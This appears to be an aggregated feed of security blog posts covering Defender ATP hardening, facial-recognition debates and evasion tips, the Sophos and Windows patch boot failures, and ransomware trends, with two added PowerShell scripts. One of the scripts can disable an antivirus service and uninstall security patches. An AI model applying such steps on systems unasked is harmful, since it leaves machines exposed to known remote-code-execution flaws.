  • Configure and validate network connections for Microsoft Defender Antivirus: Configure firewall or network filtering rules to allow required URLs.
  • Configure the block at first sight feature: Block new malware within seconds.
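As an added example (not code from the Microsoft post), the following PowerShell script applies the next generation protection settings listed above and turns on network protection, controlled folder access and one attack surface reduction rule in audit mode before enforcing them, then reads the result back. It assumes an elevated session on a Windows 10 machine with Microsoft Defender Antivirus active; the protected folder path is a constructed placeholder, and the rule ID is Microsoft's documented rule "Block all Office applications from creating child processes".

```powershell
# Added example, not part of the Microsoft blog post. Run from an elevated
# PowerShell session on Windows 10 with Microsoft Defender Antivirus active.
#Requires -RunAsAdministrator

# --- Next generation protection -----------------------------------------------
# Cloud-delivered protection: report to the cloud and submit safe samples.
Set-MpPreference -MAPSReporting Advanced
Set-MpPreference -SubmitSamplesConsent SendSafeSamples

# Cloud-delivered protection level, and how many extra seconds a suspicious
# file may be held while the cloud analyses it (0-50, on top of the default 10).
Set-MpPreference -CloudBlockLevel High
Set-MpPreference -CloudExtendedTimeout 50

# Block at first sight depends on the two settings above; make sure it is on.
Set-MpPreference -DisableBlockAtFirstSeen $false

# --- Attack surface reduction -------------------------------------------------
# Start in AuditMode so events are logged without blocking anything; after
# reviewing the audit events, change $mode to 'Enabled' and run the script again.
$mode = 'AuditMode'

Set-MpPreference -EnableNetworkProtection      $mode
Set-MpPreference -EnableControlledFolderAccess $mode

# Add a folder to the protected set (user profile folders are protected by default).
# 'C:\FinanceShare' is a constructed placeholder path.
Add-MpPreference -ControlledFolderAccessProtectedFolders 'C:\FinanceShare'

# One ASR rule: Microsoft's documented "Block all Office applications from
# creating child processes". Take further rule IDs from Microsoft's ASR reference.
$officeChildProcRule = 'D4F940AB-401B-4EFC-AADC-AD5F3C50688A'
Set-MpPreference -AttackSurfaceReductionRules_Ids     $officeChildProcRule `
                 -AttackSurfaceReductionRules_Actions $mode

# --- Verify the effective configuration ---------------------------------------
$p = Get-MpPreference
[pscustomobject]@{
    MAPSReporting          = $p.MAPSReporting
    CloudBlockLevel        = $p.CloudBlockLevel
    BlockAtFirstSeen       = -not $p.DisableBlockAtFirstSeen
    NetworkProtection      = $p.EnableNetworkProtection
    ControlledFolderAccess = $p.EnableControlledFolderAccess
    AsrRuleIds             = ($p.AttackSurfaceReductionRules_Ids     -join ',')
    AsrRuleActions         = ($p.AttackSurfaceReductionRules_Actions -join ',')
} | Format-List

# --- Review what audit mode would have blocked --------------------------------
# Defender writes audit events to its operational log: 1122 = ASR rule audited,
# 1124 = controlled folder access audited, 1125 = network protection audited.
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Windows Defender/Operational'
    Id      = 1122, 1124, 1125
} -MaxEvents 50 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, Message |
    Format-Table -Wrap
```

Get-MpPreference returns the enum settings as numbers (for example MAPSReporting 2 for Advanced), so compare against the documented numeric values when scripting checks.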

Endpoint detection and response

Microsoft Defender ATP endpoint detection and response capabilities detect advanced attacks in real-time and give you the power to respond immediately. Microsoft Defender ATP correlates alerts and aggregates them into an incident, so you can understand cross-entity attacks (Figure 1).

Alerts are grouped into an incident based on these criteria:

  • Automated investigation triggered the linked alert while investigating the original alert.
  • File characteristics associated with the alert are similar.
  • Manual association by a user to link the alerts.
  • Proximate time of alerts triggered on the same machine falls within a certain timeframe.
  • Same file is associated with different alerts.

Image of the Windows Defender Security Center.

Figure 1. Microsoft Defender ATP correlates alerts and aggregates them into incidents.

Review your alerts and incidents on the security operations dashboard. You can customize and filter the incident queue to help you focus on what matters most to your organization (Figure 2). You can also customize the alert queue view and the machine alerts view to make it easier for you to manage.

Image of a list of incidents in the Windows Defender Security Center.

Figure 2. Default incident queue displays incidents seen in the last 30 days, with the most recent incident showing at the top of the list.

Once you detect an attack that requires remediation, you can take the following actions:

Auto investigation and remediation

Microsoft Defender ATP can be configured to automatically investigate and remediate alerts (Figure 3), which will reduce the number of alerts your Security Operations team will need to investigate manually.

Image showing automated investigations in Microsoft Defender ATP.

Figure 3. You can view the details of an automated investigation to see information such as the investigation graph, alerts associated with the investigation, the machine that was investigated, and other information.

Create and manage machine groups in Microsoft Defender ATP to define automation levels:

Automation levels:

  • Not protected: Machines will not get any automated investigations run on them.
  • Semi – require approval for any remediation (the default automation level): An approval is needed for any remediation action.
  • Semi – require approval for non-temp folders remediation: An approval is required on files or executables that are not in temporary folders. Files or executables in temporary folders, such as the user’s download folder or the user’s temp folder, will automatically be remediated if needed.
  • Semi – require approval for core folders remediation: An approval is required on files or executables that are in the operating system directories such as the Windows folder and the Program Files folder. Files or executables in all other folders will automatically be remediated if needed.
  • Full – remediate threats automatically: All remediation actions will be performed automatically.

Microsoft Threat Experts

Microsoft Threat Experts is a new, managed threat hunting service that provides proactive hunting, prioritization, and additional context and insights that further empower security operations centers (SOCs) to identify and respond to threats quickly and accurately with two capabilities:

  1. Targeted attack notifications—Alerts that are tailored to organizations provide as much information as can be quickly delivered to bring attention to critical network threats, including the timeline, scope of breach, and the methods of intrusion.
  2. Experts on demand—When a threat exceeds your SOC’s capability to investigate, or when more actionable information is needed, security experts provide technical consultation on relevant detections and adversaries. In cases where a full incident response becomes necessary, seamless transition to Microsoft incident response services is available.

Microsoft Defender ATP customers can register for Microsoft Threat Experts and we will reach out to notify you via email when you’ve been selected.

Learn more

Check back in a few weeks for our final blog post in the series, “Step 10. Detect and investigate security threats,” which will give you tips to deploy Azure Advanced Threat Protection to detect suspicious activity in real-time.


The post Step 9. Protect your OS: top 10 actions to secure your environment appeared first on Microsoft Security.

“Hackable?” Puts Smartphones to the Test

Is the Personal Data on Your Smartphone Vulnerable? Listen to Find Out: Used for everything from banking and taking pictures, to navigating, streaming, and connecting, mobile devices are a treasure trove of sensitive personal data. On the latest episode of “Hackable?” the team investigates how secure that data really is by inviting a white-hat to try and remotely penetrate our host Geoff’s smartphone. Listen now on Apple Podcasts and learn if one errant click could expose everything, including your deleted photos.  


The post “Hackable?” Puts Smartphones to the Test appeared first on McAfee Blogs.

Facial Recognition Software 101: Current Debates and How to Elude It

Facial recognition software is a relatively new technological development that is becoming adopted on a large scale by law enforcement agencies and national intelligence agencies worldwide.

Theoretically, the adoption of facial recognition software and other biometric identification methods could help identify attacks before they occur and generally lead to a faster capture of criminals. Practically, many citizens and digital privacy advocates are fighting back against the use of facial recognition software.

So why is facial recognition software such a charged topic?

To help anyone understand exactly why people don’t like it, I’ll first dive into the current debates surrounding it and on the main controversies about facial recognition software. Then, I’ll continue by explaining how the technology works and how you can confuse it or resist it.

While I wouldn’t encourage anyone to do anything illegal or resist legitimate info requirements made by public authorities, the truth is that facial recognition software is still, in many ways, a wild west. The laws are being debated and subject to change.

Innovators and authorities are still exploring what the technology can do and discover new functionalities. Meanwhile, the public tries to catch up and debate whether the functionality should be used in the first place.

Therefore, attempts to resist facial recognition software and to confuse it are a vital part of current negotiations and debates, in a new landscape where the right to a private life can’t be taken for granted anymore.

But before we dive in deep into the intricacies of facial recognition software, we need to look a bit to the history of developing facial recognition software.

A short history of facial recognition software:

  • Mid-1960s: American mathematician Woodrow Wilson Bledsoe and his team develop a simple device which records facial features using a stylus and a tablet. His efforts helped pave the way towards modern facial recognition software and his intelligence team members are considered pioneers of AI and pattern recognition.
  • Between the 1980s and 1990s: MIT, Rhode Island, and Brown University scientists develop the technology further, leading to Eigenfaces. Eigenfaces are two-dimensional facial structures generated through algebraic formulae. They laid the foundation for contemporary facial recognition software.
  • After 2001: The 9/11 terrorist attacks highlighted the need to strengthen border security with better personal identification, via facial recognition software. This led to a wide-scale adaptation of this software, which continues to be improved to this day. Applications of the software were quickly picked up by the commercial sector as well (see below).
  • 2005: The first personal phone with facial recognition software is unveiled at the Security Show Japan. The technology was named OKAO Vision Face Recognition Sensor and it was developed by the OMRON Corporation.
  • 2005 – present: Facial recognition software is increasingly adopted by most smartphones but also perfected for the use of law enforcement and military groups. Machine learning and AI are employed for taking its accuracy to new heights and to vary its applications.

Why Is Facial Recognition Software So Debated Today?

As you can see, facial recognition software also has some consumer applications which are pretty popular (like the ones for smartphones).

Since security experts have long decried single-factor authentication (like security measures consisting only of passwords) as being too vulnerable to hacking (through credential stuffing attacks, for example), two-factor authentication is increasingly recommended and implemented. Some voices say even two-factor authentication is not as secure as previously thought.

In this context, methods of biometric authentication seem like a more secure way of accessing your accounts. Signing in with your face, your fingerprint, your iris scan or other bodily identity factors, which are (theoretically) accessible to no one but you, is the next level.

So why then are people against facial recognition software?

First and foremost, because facial recognition software started being employed in mass surveillance programs at nation-wide levels. People may not be against facial recognition software per se, but the way it started being used by law enforcement and state intelligence agencies is making most citizens uncomfortable.

Secondly, it’s not just a matter of privacy infringement: facial recognition software is also prone to errors and bias, which cause people further discomfort.

Thirdly, as people become more educated in cybersecurity matters, with news of new data breaches making headlines every month, everyone is realizing that the safest bet is to have as little of your data collected as possible. If you allow devices to record even your most personal and private biometric data and store it for recognition and authentication, sooner or later the data might fall into the wrong hands.

There are other ways of being safe or employing multi-factor authentication methods; you don’t need to hand over your intimate bodily data. Besides, some biometric data is very easily faked by hackers just by seeing a photo of their victim where the hands are visible. In a famous case, a German minister’s fingerprints were replicated by hackers using just public photos.

Countries Which Are in the Spotlight for Facial Recognition Software

But the first reason for which people are outraged by facial recognition software lately is the way some public authorities started employing it. In the past half-year, some countries have been more under the spotlight for using facial recognition software in a way equated by people to a dystopian-like mass surveillance campaign.

These countries are:

#1. The US

In most American cities, unless explicitly banned due to public backlash and protests, police authorities have adopted the use of facial recognition software.

Since the technology behind facial recognition software is rather new and unprecedented, laws haven’t managed to catch up with it. Therefore, it’s still akin to the wild west: police are using the tech liberally and gathering as much data as they can, just thinking that it might be useful in the future or in order to train the programs to be more accurate.

As of 2016, it was estimated that 50% of the population was in the databases of police-owned facial recognition software, and that was 3 years ago.

If laws concerning the collection of private data without consent are in place, they are targeted at companies and advertisers, not at law enforcement. However, digital rights advocacy groups started speaking out against the rights of law enforcement to gather and make use of such data without a just reason. The following year will probably bring significant changes, one way or the other, as the matter is settled towards one pole or the other. More details on debates and protests below.

#2. The UK


“One Nation Under CCTV,” 2007 mural by Banksy (Flickr/ogglog).

In the UK, the use of facial recognition software by law enforcement seems to be even more pervasive than in the US, raising deeper concern over citizen rights and dystopian potential. To say that the use of this tech by police forces is contested would be an understatement.

First of all, as the use of this tech is yet unregulated, the police are apparently using it without permission. Privacy rights advocates such as the Big Brother Watch NGO are campaigning against the use, calling it unlawful and abusive towards privacy rights. Other studies report numerous ways in which surveillance via facial recognition software infringes on multiple citizen rights.

The UK police have also been taken to court over their use of facial recognition software, in a first such case. Until the matter is settled via legislation, more trials and protests will probably follow.

The fact that the use of the software is not even particularly effective doesn’t help improve its public perception either.

#3. China

China is facing international outrage over its treatment of the Uighur minority in the Xinjiang region, who are under constant surveillance through various technological means, including facial recognition, voice recording and spying (even when not talking on the phone, and so on). Chinese police forces even have smart glasses with built-in facial recognition systems, so the potential of the tech is very high.

#4. Germany

Germany tested out using facial recognition software for checking the people who pass through a train station, on the basis of volunteers and the completely consensual ceding of biometric photos. However, it didn’t take long for privacy advocates to raise alarms. Considering the country’s history of mass surveillance by the government, I think the quick response, even if the trigger was ‘softer’ than the practices adopted by other countries, is a healthy exercise in democracy.

Other countries (less concerning cases):

Facial recognition software is also employed by law enforcement in the United Arab Emirates (for border control and such).

In Japan, the tech is being used for some controversial things like checking whether employees are smiling enough and so on, but since it’s not controversial in how police forces are using it, I won’t be including Japan in the list of really concerning countries.

Singapore, the tech capital of Asia, also employs facial recognition software widely for fast check-ins and such, but no reports of abuse have come through. Of course, it’s very possible that the West is experiencing more public protests about this kind of tech because of cultural differences and a greater awareness of privacy rights.

How People Are Fighting Back against Facial Recognition Software and Why

While, for their part, law enforcement agencies defend their use of facial recognition software by highlighting its positive effects, people are not convinced.

In the US and UK, regular protests were held against the police use of facial recognition software without probable cause, as well as against storing the data obtained through this software without consent. If we look at some of the recent and non-recent protests, it’s pretty clear that many citizens see facial recognition software as having the potential to lead to a dystopian world, at least when it is in the hands of public forces.

  • In Washington, DC, people made a logo from the Eye of Sauron (from the Lord of the Rings trilogy) and the campaign message ‘Stop Watching Us, Sauron’ in order to protest surveillance;
  • An NSA program which uses machine learning to identify probable terrorists has been dubbed Skynet, in a reference to the machine turned mad which ultimately takes control of humans in the Terminator series.

Recently, San Francisco registered a huge win in this fight: due to citizen backlash, it became the first city to ban the use of facial recognition software by police and municipal authorities. Reports say that Oakland may soon follow in its trail.

Tenants in Brooklyn, New York, are protesting the plans of a landlord to install facial recognition software in their building. If the protest is successful, it will serve as a useful precedent to fight future potentially unethical uses of this software.

In other parts of the world, like China, protests were obviously not held against this tech, but the Uighur minority members who manage to get away (usually to Turkey as a preferred asylum destination) are complaining about the all-controlling digital surveillance tech back home.

Protesting facial recognition software is not all political; there are also economic ways of sanctioning the use of technologies which are perceived as infringing people’s privacy.

Advocacy groups are combining their efforts to exert pressure on big tech companies like Google and Microsoft in order to prevent them from selling facial recognition software to the government. Google agreed to the requests and said it will not release such software for now, until it finds good ways to ensure its ethical use.

Amazon protestors using printed masks of Jeff Bezos in order to condemn facial recognition software, via NYTimes.

Amazon acknowledged the tech’s potential for abuse but continued seeking partnerships with federal forces. As a result, it is now facing investor pressure to stop selling facial recognition tech to law enforcement. Its employees are protesting it as well, though with little success so far. Luckily, investors stepped in to call for an ethics check on the practice, with a greater potential of obtaining results.

Regular citizens are also fighting the use of facial recognition software through social media shares of incidents they are subjected to. In the digital age, this disclosure can gain quite the traction. Thanks to these small but significant ways to fight it, several new problems were revealed, beyond the privacy infringement and potential to lead to a totalitarian rule.

Apparently, facial recognition software can also be racist and gender biased. Because it was fed biased photos (in the hunger of authorities to just push images into it indiscriminately, including celebrity photos and everything they could get their hands on from private citizens without consent), facial recognition software has trouble correctly identifying women and black people. Women of color are a particularly targeted category since they are subjected to a double bias.

Facial Recognition Software Tech Details: How It Works

Just like photo cameras were in a way designed to crudely imitate the human eye, so was facial recognition software emulated on the way people recognize faces.

Step 1: At least one picture of your face is captured by the software, from public sources, from CCTV video, or similar.

Step 2: The facial recognition software ‘reads’ the geometry of your face and measures out the proportional distances between the main features, their depth, their 3D shapes and so on.

Step 3: All this is compiled into a set of mathematical data – your face’s formula.

Step 4: This string of numbers is then compared to a database of millions of other face captures, and the likeliest match is drawn.

Two examples of facial recognition software fails, via PopularMechanics.

This is the basic way it works. Is it accurate? Not really, several sources attest, but it does seem to get better and better thanks to more data being fed into it (with or without consent) and artificial intelligence algorithms.

How to Confuse Facial Recognition Software

Since the use of facial recognition software, even by law enforcement, is not yet regulated, resisting it does not constitute a crime. Harsher climates may impose charges, but this only leads to greater public backlash. A recent case of a UK man being fined after covering his face to elude facial recognition software has sparked an even more energetic opposition to police using this tech.

The interesting part is that since there are no laws yet regulating the use of facial recognition software (in the UK), not only is resisting it not illegal, but its use (by police) is not yet legal either.

Still, until the matters are settled and each country negotiates its own limits on the use of this controversial tech, let’s take a look at how facial recognition software can be confused.

There are at least 3 ways, but it’s debatable for how long they will continue to work.

#1. Wear a partial mask:

The old cover-up method is by far the most effective, but in some places, it can get you in trouble, as in the case of the UK man discussed above. Since you’re wearing a face mask, it’s pretty clear that you’re trying to hide your identity and that can draw unwanted attention from the police.

#2. Wear special clothing items for confusing facial recognition software:

There are several clothing items with confusing patterns on them which were specially designed to prevent cameras using facial recognition software from being able to tell where your face is. For example, a pair of psychedelic glasses, this scarf by Hyphen-Labs, an anti-surveillance coat, or a baseball cap that projects tiny laser dots onto your face, invisible to the human eye but confusing for the software.

Anti-Face, the art project by CVDazzle.

#3. Wear irregular make-up designed for confusing facial recognition software:

Another creative way to confuse facial recognition software is through make-up. The CVDazzle group has developed a series of looks which make your face untrackable, but their efforts aim to be a form of artistic protest and not a practical everyday solution for eluding recognition.

Positive Examples of Facial Recognition Software Applications

Since I want to maintain a non-biased overview of everything related to facial recognition software, I feel we should also note some of its applications which can make a positive difference in the world.

I won’t include crime prevention in the list, even though it is often mentioned by authorities as the main reason for a wide-spread employment of facial recognition software methods. While it may indeed have a positive impact on preventing or reducing crime, I stand with those who believe individual freedom is more important than collective security.

Here are a few cool applications of facial recognition software:

Final Words

Facial recognition software, especially the advanced types used at the state level, is based on powerful machine learning technologies. Thus, unfortunately, even if you manage to successfully confuse it through creative means, the algorithms are bound to catch up and improve. Perhaps digital artists will be able to keep up and find new ways to confuse the software in a cat and mouse game, for a while.

But the real target of those concerned about facial recognition software should still remain the political debate and negotiation. The recent victory of citizens over local authorities in San Francisco has proved that where there’s a will, there’s a way. Nonetheless, no one should ignore the positive aspects which may come from facial recognition software.

Still, being more careful about what data we share and with whom should be a must for all of us. How about you? Who logs into their cell phone with facial recognition?

The post Facial Recognition Software 101: Current Debates and How to Elude It appeared first on Heimdal Security Blog.

Endpoint’s Relevance in the World of Cloud

Businesses everywhere are looking to cloud solutions to help expedite processes and improve their data storage strategy. All anyone is talking about these days is the cloud, which seems to be crowding out the conversation around individual devices and their security. However, many don’t realize these endpoint devices act as gateways to the cloud, which makes their security more pressing than ever. In fact, there is a unique relationship between endpoint security and cloud security, making it crucial for businesses to understand how this dynamic affects information security overall. Let’s explore exactly how these two are intertwined and how endpoint security can move the needle when it comes to securing the cloud.

Cloudier Skies

Between public cloud, private cloud, hybrid cloud, and now multi-cloud, the cloud technology industry is massive and showing zero signs of slowing down. Adoption is rampant, with the cloud market expected to achieve a five-year compound annual growth rate (CAGR) of 22.5%, with public cloud services spending reaching $370 billion in 2022. With cloud adoption drawing so much attention from businesses, it’s as important as ever that enterprises keep security top of mind.

This need for security is only magnified by the latest trend in cloud tech – the multi-cloud strategy. With modern-day businesses having such a diverse set of needs, many have adopted either a hybrid or multi-cloud strategy in order to effectively organize and store a plethora of data – 74 percent of enterprises, as a matter of fact. This has many security vendors and personnel scrambling to adjust security architecture to meet the needs of the modern cloud strategy. And though all businesses must have an effective security plan in place that complements their cloud architecture, these security plans should always still consider how these clouds can become compromised through individual gateways, or, endpoint devices.

The Relationship Between Endpoint and Cloud

The cloud may be a virtual warehouse for your data, but every warehouse has a door or two. Endpoint devices act as doors to the cloud, as these mobile phones, computers, and more all connect to whichever cloud architecture an organization has implemented. That means that one endpoint device, if misused or mishandled, could create a vulnerable gateway to the cloud and therefore cause it to become compromised. Mind you – endpoint devices are not only gateways to the cloud, but also the last line of defense protecting an organization’s network in general.

Endpoint is not only relevant in the world of cloud – it has a direct impact on an organization’s cloud – and overall – security. A compromised endpoint can lead to an exposed cloud, which could make for major data loss. Businesses need to therefore put processes into place that outline what assets users put where and state any need-to-knows they should have top of mind when using the cloud. Additionally, it’s equally important every business ensures they make the correct investment in cloud and endpoint security solutions that perfectly complement these processes.

Ensuring Security Strategy Is Holistic

As the device-to-cloud cybersecurity company, we at McAfee understand how important the connection is between endpoint and cloud and how vital it is businesses ensure both are secured. That’s why we’ve built out a holistic security strategy, offering both cloud security solutions and advanced endpoint products that help an organization cover all its bases.

If your business follows a holistic approach to security – covering every endpoint through to every cloud – you’ll be able to prevent data exposures from happening. From there, you can have peace of mind about endpoint threats and focus on reaping the benefits of a smart cloud strategy.

To learn more about our approach to endpoint security strategy, be sure to follow us @McAfee and @McAfee_Business, and read more in our latest paper:


The post Endpoint’s Relevance in the World of Cloud appeared first on McAfee Blogs.

Privacy Advisory: What Regulatory Changes Have Been Happening Around Cookie Consent

The TrustArc “Current State of Cookie Consent Compliance and Enforcement” Privacy Advisory provides a brief background on cookies and tracking technologies, the role of the GDPR’s definition of consent and that law’s relationship to ePrivacy. Also addressed are recent cookie consent-related activities by several regulatory authorities, clarifying compliance requirements within the EU, and early possible interpretations relating to cookie practices under the forthcoming California Consumer Privacy Act (CCPA). The EU ePrivacy Directive regime, as implemented among the individual Member States, independently requires consent as a pre-condition to lawfully accessing or storing information on an end user’s device. ePrivacy uses the … Continue reading Privacy Advisory: What Regulatory Changes Have Been Happening Around Cookie Consent

The post Privacy Advisory: What Regulatory Changes Have Been Happening Around Cookie Consent appeared first on TrustArc Blog.

After the latest Microsoft Windows updates, some PCs running Sophos AV do not boot

Sophos is warning users of potential problems with Microsoft’s recent Patch Tuesday updates and is telling them to roll the updates back if they want their PCs to boot.

The security firm has informed its customers of potential problems with the latest Microsoft Patch Tuesday updates and is asking them to uninstall the patch if they want the machine to boot.

This means that the machine could be exposed to cyber attacks that leverage the vulnerabilities addressed by Microsoft, including a Windows zero-day flaw and an RDS vulnerability that can be exploited to carry out WannaCry-like attacks.

Sophos confirmed that the latest set of Windows updates is causing boot problems on computers running its popular antivirus software.

“We have had a few customers reporting that following on from the Microsoft Windows 14th May patches they are experiencing a hang on boot where the machines appear to get stuck on ‘Configuring 30%’,” reads a note published by the company.

Experts believe the problems could be caused by an incompatibility with the Microsoft patches KB4499164 and KB4499175, released on May 14, 2019.

According to Sophos, the problems have been reported by customers running Windows 7 and Windows Server 2008 R2.

The experts suggest removing the Windows update by booting the system in Safe Mode.

“Current reports indicate that removing the Windows update in Safe Mode allows computers to boot as normal,” continues the note.

“If you experience issues removing this in Safe Mode, please set the ‘Sophos Anti-Virus’ Service startup to be ‘Disabled’ and then attempt to remove the update after coming out of Safe Mode.”

Sophos is currently working with Microsoft to investigate the issue and develop a fix.
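The workaround quoted above (remove the update in Safe Mode, or set the Sophos Anti-Virus service to Disabled first if removal fails), as an added PowerShell example that is not from Sophos or the article’s author. It assumes the affected hosts are Windows 7 / Server 2008 R2 (OS version 6.1), that the service can be found by the display name quoted in the note, and that the updates are the two KBs the article names; removing them reopens the vulnerabilities they fix, including CVE-2019-0708, so the default mode only audits.

```powershell
# Added example (not Sophos or Security Affairs code). Audits a host for the combination the
# article describes and, only with -Remediate, applies the vendor's workaround.
# Assumptions: Windows 7 / Server 2008 R2 report OS version 6.1; the service is found by the
# display name quoted in the Sophos note; wusa.exe is available. Run from an elevated prompt.
param(
    [switch]$Remediate
)

$AffectedKBs        = @('KB4499164', 'KB4499175')  # May 14, 2019 updates named in the article
$ServiceDisplayName = 'Sophos Anti-Virus'           # display name quoted in the vendor note

# Win32_OperatingSystem works on the older PowerShell versions these OS releases ship with.
$os = Get-WmiObject -Class Win32_OperatingSystem
$isAffectedOS = $os.Version -like '6.1.*'

# Which of the two updates are actually installed on this host?
$installed = @()
foreach ($kb in $AffectedKBs) {
    if (Get-HotFix -Id $kb -ErrorAction SilentlyContinue) { $installed += $kb }
}

# Win32_Service exposes StartMode on all PowerShell versions (Get-Service gained StartType later).
$svc = Get-WmiObject -Class Win32_Service -Filter "DisplayName='$ServiceDisplayName'"

Write-Host ("OS             : {0} ({1})" -f $os.Caption, $os.Version)
Write-Host ("Affected OS    : {0}" -f $isAffectedOS)
Write-Host ("Updates present: {0}" -f $(if ($installed.Count) { $installed -join ', ' } else { 'none' }))
if ($svc) {
    Write-Host ("Sophos service : {0} (state {1}, startup {2})" -f $svc.Name, $svc.State, $svc.StartMode)
} else {
    Write-Host "Sophos service : not present"
}

if (-not ($isAffectedOS -and $installed.Count -gt 0 -and $svc)) {
    Write-Host "Host does not match the reported combination; nothing to do."
    return
}
if (-not $Remediate) {
    Write-Host "Audit only. Re-run with -Remediate to apply the workaround from the vendor note."
    return
}

# Workaround step 1: keep the AV service from starting with Windows, as the note advises
# when removal from Safe Mode fails.
Set-Service -Name $svc.Name -StartupType Disabled
Write-Host ("Set startup of service '{0}' to Disabled." -f $svc.Name)

# Workaround step 2: remove each installed update. wusa exit code 3010 means a reboot is pending.
foreach ($kb in $installed) {
    $num = $kb -replace '^KB', ''
    $p = Start-Process -FilePath 'wusa.exe' -ArgumentList "/uninstall /kb:$num /quiet /norestart" -Wait -PassThru
    Write-Host ("wusa /uninstall {0} exit code: {1}" -f $kb, $p.ExitCode)
}
Write-Host "Reboot when convenient. Re-enable the service and reinstall the updates once Sophos and Microsoft publish a fix."
```

In audit mode the script changes nothing, which is the mode to run across a fleet to size the rollback before touching any machine.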

Microsoft Patch Tuesday updates for May 2019 also addressed a remote code execution flaw in Remote Desktop Services (RDS). The flaw, tracked as CVE-2019-0708, can be exploited by an unauthenticated attacker by connecting to the targeted system via the Remote Desktop Protocol (RDP) and sending specially crafted requests. Microsoft pointed out that this vulnerability could be exploited by malware with wormable capabilities. It can be triggered by an unauthenticated attacker without user interaction, making it possible for malware to spread in an uncontrolled way across target networks.

The problem faced by Sophos customers could be very annoying for large businesses that deployed the Microsoft updates. One user commenting on a blog post published by Sophos wrote the following statement:

“We had to roll back some 300+ machines for clients around the US.”

Affected users that are not able to boot their machine have to contact the company and open a ticket with the tech support team.

Pierluigi Paganini

(SecurityAffairs – Sophos, Microsoft)

The post After the latest Microsoft Windows updates, some PCs running Sophos AV do not boot appeared first on Security Affairs.

Celebrating the Next Generation of Technology Innovators

At Trend Micro, it’s our mission to secure the connected world. However, we want to go beyond the boundaries of the cybersecurity industry to support and learn from the technology innovators of tomorrow. That’s what our venture arm, Trend Forward Capital, is all about.

As part of these efforts, we held a pitch-off competition this week for ambitious start-ups at our North American headquarters in Dallas. We’d like to congratulate all those who took part, and particularly Roby on winning the $10,000 Forward Thinker Award.

Five minutes to shine

Trend Micro has run highly successful pitch-off competitions at the past two CES shows. This was the first time we’ve brought the idea back home to our headquarters. We certainly weren’t disappointed with the quality of applicants – around 50 submissions were whittled down to the final five participants. Each was given five minutes to present to a formidable line-up of judges, including Trend Micro co-founder and CEO, Eva Chen; Marwan Forzley, CEO of one of our start-up success stories, Veem; and Tom Whittaker of IBM ventures.

The quality of presentations was high, as was the energy in the room. From credit scoring for farms to parenting management, and hybrid cloud connectivity to AI and African healthcare — the sheer range of innovative ideas on show was fantastic to see. We were also pleased to see shortlisted a local Dallas-based business and two from Austin, testament to the burgeoning start-up scene in Texas.

Competing presenters were judged on five key criteria: leadership, product, addressable market, customer validation and business model.

Backing local businesses

In the end, the judges thought Roby – an office automation company – had the edge on the competition. As well as the cash prize, the company will now be considered for pre-selection for our 2020 CES pitch-off, and receive two passes to the show. However, we’d like to thank all those who took part. Even for those that didn’t quite make it, competitions like this are a valuable opportunity to practice their pitches and set themselves up for success next time. There were also plenty of local investors and other industry influencers in the room to impress.

There’s a wealth of great ideas out there, and Trend Micro remains committed to finding them and giving ambitious entrepreneurs the opportunity to shine. In so doing, we hope to help create a smarter, more connected world while learning a little ourselves from the disrupters of tomorrow.

The post Celebrating the Next Generation of Technology Innovators appeared first on .

Ransomware Not Gone but More Targeted, Report Says

Cyber-criminals continue to grow more sophisticated, developing advanced attack methods, including tailored ransomware, according to the Q1 Global Threat Landscape Report, published today by Fortinet. In addition to targeted attacks, criminals are also using custom coding, living-off-the-land (LotL) and sharing infrastructure to maximize their opportunities, the report said.

Despite a decline in previous high rates of ransomware, ransomware itself is far from gone. Instead, cyber-criminals are using more targeted attacks. Ransomware “is being customized for high-value targets and to give the attacker privileged access to the network. LockerGoga is an example of a targeted ransomware conducted in a multi-stage attack. There is little about LockerGoga that sets it apart from other ransomware in terms of functional sophistication, but while most ransomware tools use some level of obfuscation to avoid detection, there was little of it used when analyzed,” the report said.

Researchers also detected an uptick in malicious actors leveraging dual-use tools preinstalled on targeted systems to carry out cyber-attacks.

The report noted the trend of shared infrastructure. Researchers detected a rise in the total malware and botnet communication activity, as well as the number of domains shared between threats at each stage of the kill chain.

“Nearly 60% of threats shared at least one domain indicating the majority of botnets leverage established infrastructure. IcedID is an example of this 'why buy or build when you can borrow' behavior. In addition, when threats share infrastructure they tend to do so within the same stage in the kill chain. It is unusual for a threat to leverage a domain for exploitation and then later leverage it for C2 traffic. This suggests infrastructure plays a particular role or function when used for malicious campaigns,” the report said.

“We, unfortunately, continue to see the cyber-criminal community mirror the strategies and methodologies of nation-state actors, and the evolving devices and networks they are targeting,” said Phil Quade, chief information security officer, Fortinet, in a press release.

“Organizations need to rethink their strategy to better future-proof and manage cyber risks. An important first step involves treating cybersecurity more like a science – doing the fundamentals really well – which requires leveraging the cyberspace fundamentals of speed and connectivity for defense. Embracing a fabric approach to security, micro and macro segmentation and leveraging machine learning and automation as the building blocks of AI can provide tremendous opportunity to force our adversaries back to square one.”

Infocyte HUNT Cloud for AWS: Detection and IR for high-growth cloud environments

Infocyte today announced the availability of Infocyte HUNT Cloud for AWS, a solution combining detection and IR for high-growth cloud environments, unlike traditional endpoint protection platforms (EPPs) which don’t address cloud workloads.

(Image caption: Analyzing a threat found injected into memory with the Infocyte HUNT platform)

Infocyte HUNT Cloud for AWS features agentless deployment through AWS APIs and artificial intelligence (AI) to quickly identify, categorize and respond to persistent, hidden and other advanced threats and vulnerabilities. Leveraging … More

The post Infocyte HUNT Cloud for AWS: Detection and IR for high-growth cloud environments appeared first on Help Net Security.

Episode 497 – Work On Expanding These Skills In Your Cybersecurity Career

The cybersecurity profession requires a very technical set of skills. However, technical skills are not the only ones employers are looking for. This episode talks about the soft skills that are being sought after in today’s workplace. Be aware, be safe. […]

The post Episode 497 – Work On Expanding These Skills In Your Cybersecurity Career appeared first on Security In Five.

Veracode Announces New DevOps Penetration Testing Service

DevSecOps can be challenging for many organizations when you consider all the areas of the DevOps process that require security testing. Organizations that begin to shift security “left” often find significant gaps in the security of infrastructure and operational components that are now integrated into the development process. Many of the technologies being used in DevOps are also very new to most organizations and are more recently starting to become “mainstream.” For example, we’re seeing more customers adopting microservices, utilizing cloud storage through Amazon S3, MongoDB, and Elasticsearch, deploying applications using containers, and managing those containers with newer orchestration technology like Kubernetes.

